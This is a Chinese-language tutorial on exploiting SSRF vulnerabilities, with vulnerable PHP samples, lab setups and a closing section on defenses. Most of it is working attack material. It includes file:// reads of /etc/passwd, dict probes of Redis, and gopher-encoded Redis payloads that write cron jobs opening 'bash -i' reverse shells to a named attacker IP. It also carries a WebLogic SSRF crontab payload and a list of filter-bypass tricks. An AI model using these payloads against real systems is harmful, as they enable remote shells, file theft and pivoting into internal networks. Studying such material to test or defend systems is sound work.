SSRF漏洞的利用与攻击内网应用实战<\/h1>

0x00 前言<\/h2>
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的安全漏洞。与CSRF(跨站请求伪造)不同，SSRF是基于服务端的请求伪造，能够请求到与服务器相连而与外网隔离的内网资源。<\/p>

0x01 SSRF漏洞简介<\/h2>

1. SSRF漏洞概述<\/h3>

SSRF漏洞允许攻击者诱导服务器端应用程序向攻击者选择的任意域发出HTTP请求，主要危害在于：<\/p>

攻击目标是从外网无法访问的内部系统<\/li>
利用网络请求服务作为跳板进行攻击<\/li>

能够绕过防火墙等访问控制措施<\/li> <\/ul>

2. SSRF漏洞产生原因<\/h3>

SSRF形成的主要原因：<\/p>

服务端提供了从其他服务器获取数据的功能<\/li>
没有对目标地址做充分的过滤与限制<\/li>

常见于以下功能场景：

转码服务<\/li>
在线翻译<\/li>
图片加载与下载<\/li>
内容采集\/网页抓取<\/li>
头像远程加载<\/li>

任何需要输入URL或IP的地方<\/li> <\/ul> <\/li> <\/ul>

3. SSRF漏洞利用场景<\/h3>

利用SSRF可以实现多种攻击：<\/p>

对外网、内网、本地进行端口扫描，获取服务banner信息<\/li>
攻击运行在内网或本地的应用程序<\/li>
对内网WEB应用进行指纹识别<\/li>
利用已知漏洞攻击内外网web应用(如Struts2、SQLi等)<\/li>
下载内网资源(利用file协议读取本地文件)<\/li>
作为攻击跳板<\/li>
绕过CDN<\/li>

利用Redis未授权访问、HTTP CRLF注入实现getshell<\/li> <\/ul>

0x02 SSRF漏洞相关函数和协议<\/h2>

1. 易导致SSRF的危险函数<\/h3>

file_get_contents()<\/code><\/li>
fsockopen()<\/code><\/li>
curl_exec()<\/code><\/li>
fopen()<\/code><\/li>

readfile()<\/code><\/li>
<\/ul>
(1) file_get_contents()示例<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$url =<\/span> $_GET['url'<\/span>];
<\/span><\/span>echo<\/span> file_get_contents<\/span>($url);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>(2) fsockopen()示例<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> GetFile<\/span>($host,$port,$link) {
<\/span><\/span>    $fp =<\/span> fsockopen<\/span>($host, intval<\/span>($port), $errno, $errstr, 30<\/span>);
<\/span><\/span>    if<\/span> (!<\/span>$fp) {
<\/span><\/span>        echo<\/span> "<\/span>$errstr<\/span> (error number <\/span>$errno<\/span>) <\/span>\n<\/span>"<\/span>;
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        $out =<\/span> "GET <\/span>$link<\/span> HTTP\/1.1<\/span>\r\n<\/span>"<\/span>;
<\/span><\/span>        $out .=<\/span> "Host: <\/span>$host\r\n<\/span>"<\/span>;
<\/span><\/span>        $out .=<\/span> "Connection: Close<\/span>\r\n\r\n<\/span>"<\/span>;
<\/span><\/span>        $out .=<\/span> "<\/span>\r\n<\/span>"<\/span>;
<\/span><\/span>        fwrite<\/span>($fp, $out);
<\/span><\/span>        $contents=<\/span>''<\/span>;
<\/span><\/span>        while<\/span> (!<\/span>feof<\/span>($fp)) {
<\/span><\/span>            $contents.=<\/span> fgets<\/span>($fp, 1024<\/span>);
<\/span><\/span>        }
<\/span><\/span>        fclose<\/span>($fp);
<\/span><\/span>        return<\/span> $contents;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>(3) curl_exec()示例<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>if<\/span> (isset<\/span>($_POST['url'<\/span>])){
<\/span><\/span>    $link =<\/span> $_POST['url'<\/span>];
<\/span><\/span>    $curlobj =<\/span> curl_init<\/span>();
<\/span><\/span>    curl_setopt<\/span>($curlobj, CURLOPT_POST<\/span>, 0<\/span>);
<\/span><\/span>    curl_setopt<\/span>($curlobj, CURLOPT_URL<\/span>, $link);
<\/span><\/span>    curl_setopt<\/span>($curlobj, CURLOPT_RETURNTRANSFER<\/span>, 1<\/span>);
<\/span><\/span>    $result=<\/span>curl_exec<\/span>($curlobj);
<\/span><\/span>    curl_close<\/span>($curlobj);
<\/span><\/span>    
<\/span><\/span>    $filename =<\/span> '.\/curled\/'<\/span>.<\/span>rand<\/span>().<\/span>'.txt'<\/span>;
<\/span><\/span>    file_put_contents<\/span>($filename, $result); 
<\/span><\/span>    echo<\/span> $result;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. SSRF利用的关键协议<\/h3>


file协议<\/strong>：在有回显的情况下，可以读取任意文件内容<\/p>
curl -vvv 'file:\/\/\/etc\/passwd'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

dict协议<\/strong>：泄露软件版本信息，查看端口，操作内网redis服务等<\/p>
curl -vvv 'dict:\/\/127.0.0.1:6379\/info'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

gopher协议<\/strong>：最强大的SSRF利用协议，支持GET\/POST请求，可用于反弹shell<\/p>
curl -vvv 'gopher:\/\/127.0.0.1:6379\/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*\/1 * * * * bash -i >& \/dev\/tcp\/127.0.0.1\/4444 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a\/var\/spool\/cron\/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

http\/s协议<\/strong>：探测内网主机存活<\/p>
<\/li>
<\/ol>
0x03 SSRF漏洞利用实战<\/h2>
1. 本地利用示例<\/h3>
(1) 使用file协议读取任意文件<\/h4>
curl -vvv 'file:\/\/\/etc\/passwd'<\/span>
<\/span><\/span><\/code><\/pre>(2) 使用dict协议获取Redis配置<\/h4>
curl -vvv 'dict:\/\/127.0.0.1:6379\/info'<\/span>
<\/span><\/span><\/code><\/pre>(3) 使用gopher协议攻击Redis<\/h4>
curl -vvv 'gopher:\/\/127.0.0.1:6379\/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*\/1 * * * * bash -i >& \/dev\/tcp\/127.0.0.1\/4444 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a\/var\/spool\/cron\/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'<\/span>
<\/span><\/span><\/code><\/pre>2. 远程利用实战<\/h3>
环境准备<\/h4>

攻击机IP：192.168.201.129、121.36.67.230<\/li>
远程服务器IP：39.x.x.x<\/li>
Docker镜像：ssrf_redis<\/li>
PHP版本：PHP 7.2.28<\/li>
<\/ul>
示例代码<\/h4>
ssrf.php:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$ch =<\/span> curl_init<\/span>();
<\/span><\/span>curl_setopt<\/span>($ch, CURLOPT_URL<\/span>, $_GET['url'<\/span>]);
<\/span><\/span>curl_setopt<\/span>($ch, CURLOPT_HEADER<\/span>, 0<\/span>);
<\/span><\/span>curl_exec<\/span>($ch);
<\/span><\/span>curl_close<\/span>($ch);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>post.php:<\/p>
<<\/span>html<\/span>><\/span>
<\/span><\/span><<\/span>head<\/span>><<\/span>title<\/span>><\/span>post<\/span><\/<\/span>title<\/span>><\/<\/span>head<\/span>><\/span>
<\/span><\/span><<\/span>body<\/span>><\/span>
<\/span><\/span>    <?<\/span>php<\/span> echo<\/span> $_REQUEST[cmd<\/span>]; ?><\/span>
<\/span><\/span><\/span><\/body>
<\/span><\/span><\/span><\/html>
<\/span><\/span><\/span><\/code><\/pre>利用方式<\/h4>

利用file协议读取文件<\/strong><\/li>
<\/ol>
curl -v 'http:\/\/39.x.x.x:8000\/ssrf.php?url=file:\/\/\/etc\/passwd'<\/span>
<\/span><\/span><\/code><\/pre>
利用dict协议探测服务<\/strong><\/li>
<\/ol>
curl -v 'http:\/\/39.x.x.x:8000\/ssrf.php?url=dict:\/\/127.0.0.1:22\/'<\/span>
<\/span><\/span><\/code><\/pre>
利用gopher协议攻击Redis<\/strong><\/li>
<\/ol>
curl -v 'http:\/\/39.x.x.x:8000\/ssrf.php?url=gopher:\/\/192.168.1.4:6379\/_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f5555%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'<\/span>
<\/span><\/span><\/code><\/pre>
伪造POST请求反弹shell<\/strong><\/li>
<\/ol>
curl -v 'http:\/\/39.x.x.x:8000\/ssrf.php?url=gopher:\/\/192.168.1.5:80\/_POST%20\/post.php%20HTTP\/1.1%250d%250aHost:%2039.105.93.165%250d%250aUser-Agent:%20curl\/7.58.0%250d%250aAccept:%20*\/*%250d%250aContent-Type:%20application\/x-www-form-urlencoded%250d%250a%250d%250acmd%3Dccccc%250d%250a%250d%250abash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f4444%200%3E%261'<\/span>
<\/span><\/span><\/code><\/pre>
利用http\/s协议探测内网主机<\/strong><\/li>
<\/ol>
curl -v 'http:\/\/39.x.x.x:8000\/ssrf.php?url=http:\/\/192.168.1.3'<\/span>
<\/span><\/span><\/code><\/pre>0x04 SSRF攻击应用实战<\/h2>
1. Weblogic SSRF攻击Redis<\/h3>
环境搭建：<\/p>
git clone https:\/\/github.com\/vulhub\/vulhub\/tree\/master\/weblogic\/ssrf
<\/span><\/span>cd vulhub\/weblogic\/ssrf
<\/span><\/span>docker-compose build
<\/span><\/span>docker-compose up -d
<\/span><\/span><\/code><\/pre>漏洞存在于：<\/p>
http:\/\/your-ip:7001\/uddiexplorer\/SearchPublicRegistries.jsp
<\/code><\/pre>
攻击步骤：<\/h4>

探测端口开放情况：<\/li>
<\/ol>
\/uddiexplorer\/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http:\/\/127.0.0.1:7001
<\/code><\/pre>

探测内网主机存活：<\/li>
<\/ol>
\/uddiexplorer\/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http:\/\/192.168.1.1
<\/code><\/pre>

攻击Redis反弹shell：<\/li>
<\/ol>
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
<\/code><\/pre>
0x05 SSRF漏洞绕过技术<\/h2>
1. 常用绕过方法<\/h3>


使用@符号<\/strong>：<\/p>
http:\/\/abc@127.0.0.1
http:\/\/8.8.8.8@127.0.0.1:8080
http:\/\/127.0.0.1#8.8.8.8
<\/code><\/pre>
<\/li>

利用[::]<\/strong>：<\/p>
http:\/\/[::]:80\/ → http:\/\/127.0.0.1
<\/code><\/pre>
<\/li>

添加端口号<\/strong>：<\/p>
http:\/\/127.0.0.1:8080
<\/code><\/pre>
<\/li>

利用短网址服务<\/strong>：<\/p>

站长工具短网址<\/li>
百度短网址<\/li>
<\/ul>
<\/li>

利用特殊域名<\/strong>：<\/p>
127.0.0.1.xip.io → 127.0.0.1
<\/code><\/pre>
<\/li>

DNS解析<\/strong>：

设置A记录指向127.0.0.1<\/p>
<\/li>

进制转换<\/strong>：<\/p>

八进制：0177.0.0.1<\/li>
十六进制：0x7f.0.0.1<\/li>
十进制：2130706433<\/li>
<\/ul>
<\/li>

使用句号<\/strong>：<\/p>
127。0。0。1 → 127.0.0.1
<\/code><\/pre>
<\/li>

302跳转<\/strong>：

使用https:\/\/tinyurl.com生成302跳转地址<\/p>
<\/li>
<\/ol>
2. 针对特定限制的绕过<\/h3>


限制为特定域名<\/strong>：<\/p>
http:\/\/www.xxx.com@www.xxc.com
<\/code><\/pre>
<\/li>

限制IP不为内网地址<\/strong>：<\/p>

使用短网址<\/li>
使用特殊域名<\/li>
进制转换<\/li>
<\/ul>
<\/li>

限制请求只为http协议<\/strong>：<\/p>

302跳转<\/li>
短地址<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 SSRF漏洞防御措施<\/h2>

禁用危险协议<\/strong>：如file:\/\/、gopher:\/\/、dict:\/\/等，仅允许http和https<\/li>
统一错误信息<\/strong>：防止通过错误信息判断端口状态<\/li>
限制跳转<\/strong>：禁止302跳转，或每次跳转检查新Host是否为内网IP<\/li>
设置白名单<\/strong>：限制URL或IP白名单<\/li>
验证用户输入<\/strong>：严格校验用户提供的URL<\/li>
使用网络层防护<\/strong>：限制服务器出网流量<\/li>
<\/ol>
0x07 总结<\/h2>
SSRF漏洞危害严重，能够穿透网络边界攻击内网系统。攻击者可以利用各种协议和绕过技术实施攻击，防御需要从代码层和网络层多维度进行防护。开发过程中应特别注意所有涉及外部资源请求的功能点，实施严格的输入验证和访问控制。<\/p>